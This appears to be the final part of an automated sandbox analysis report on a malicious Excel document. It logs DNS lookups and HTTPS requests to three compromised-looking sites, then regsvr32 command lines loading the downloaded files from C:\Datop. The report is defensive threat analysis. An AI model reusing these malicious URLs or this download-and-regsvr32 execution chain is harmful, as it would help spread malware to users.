                                                                                                                                                        Oct 12, 2021 17:22:04.244064093 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:04.244095087 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:04.244225979 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:04.244262934 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:04.244278908 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:04.244333029 CEST49761443192.168.2.5108.179.242.179

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 12, 2021 17:21:58.494787931 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                        Oct 12, 2021 17:21:58.513123035 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.180073023 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                        Oct 12, 2021 17:22:00.198339939 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.640208006 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                        Oct 12, 2021 17:22:03.658694983 CEST53652968.8.8.8192.168.2.5

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        Oct 12, 2021 17:21:58.494787931 CEST192.168.2.58.8.8.80xb778Standard query (0)ohemaa.orgA (IP address)IN (0x0001)
                                                                                                                                                        Oct 12, 2021 17:22:00.180073023 CEST192.168.2.58.8.8.80x26e0Standard query (0)madieandme.com.auA (IP address)IN (0x0001)
                                                                                                                                                        Oct 12, 2021 17:22:03.640208006 CEST192.168.2.58.8.8.80xfacdStandard query (0)amerident.com.doA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        Oct 12, 2021 17:21:58.513123035 CEST8.8.8.8192.168.2.50xb778No error (0)ohemaa.org172.93.99.178A (IP address)IN (0x0001)
                                                                                                                                                        Oct 12, 2021 17:22:00.198339939 CEST8.8.8.8192.168.2.50x26e0No error (0)madieandme.com.au101.0.112.4A (IP address)IN (0x0001)
                                                                                                                                                        Oct 12, 2021 17:22:03.658694983 CEST8.8.8.8192.168.2.50xfacdNo error (0)amerident.com.do108.179.242.179A (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • ohemaa.org
                                                                                                                                                        • madieandme.com.au
                                                                                                                                                        • amerident.com.do

                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.549745172.93.99.178443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-10-12 15:21:58 UTC0OUTGET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: ohemaa.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2021-10-12 15:22:00 UTC0INHTTP/1.1 200 OK
                                                                                                                                                        Connection: close
                                                                                                                                                        x-powered-by: PHP/5.6.40
                                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                                        content-length: 0
                                                                                                                                                        date: Tue, 12 Oct 2021 15:22:00 GMT
                                                                                                                                                        server: LiteSpeed
                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.549756101.0.112.4443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-10-12 15:22:00 UTC0OUTGET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: madieandme.com.au
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2021-10-12 15:22:03 UTC0INHTTP/1.1 200 OK
                                                                                                                                                        Connection: close
                                                                                                                                                        x-powered-by: PHP/7.2.34
                                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                                        content-length: 0
                                                                                                                                                        date: Tue, 12 Oct 2021 15:22:03 GMT
                                                                                                                                                        server: LiteSpeed
                                                                                                                                                        vary: User-Agent
                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        2192.168.2.549761108.179.242.179443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-10-12 15:22:03 UTC1OUTGET /xdOMlaB0XJ7/ocraf.html HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: amerident.com.do
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2021-10-12 15:22:04 UTC1INHTTP/1.1 200 OK
                                                                                                                                                        Date: Tue, 12 Oct 2021 15:22:04 GMT
                                                                                                                                                        Server: nginx/1.19.10
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-Server-Cache: true
                                                                                                                                                        X-Proxy-Cache: HIT
                                                                                                                                                        Connection: close


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:17:21:54
                                                                                                                                                        Start date:12/10/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                        Imagebase:0x1310000
                                                                                                                                                        File size:27110184 bytes
                                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:17:22:03
                                                                                                                                                        Start date:12/10/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                                                                                                                                                        Imagebase:0x360000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:17:22:04
                                                                                                                                                        Start date:12/10/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                                                                                                                                                        Imagebase:0x360000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:17:22:04
                                                                                                                                                        Start date:12/10/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                                                                                                                                                        Imagebase:0x360000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >